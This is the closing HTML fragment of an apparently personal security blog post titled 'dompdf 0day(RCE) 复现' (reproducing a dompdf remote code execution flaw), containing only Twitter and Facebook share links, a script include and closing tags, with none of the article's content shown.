        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0 + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2022%2F03%2F19%2Fdompdf%25200day(RCE)%25E5%25A4%258D%25E7%258E%25B0%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2022/03/19/dompdf%200day(RCE)%E5%A4%8D%E7%8E%B0/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
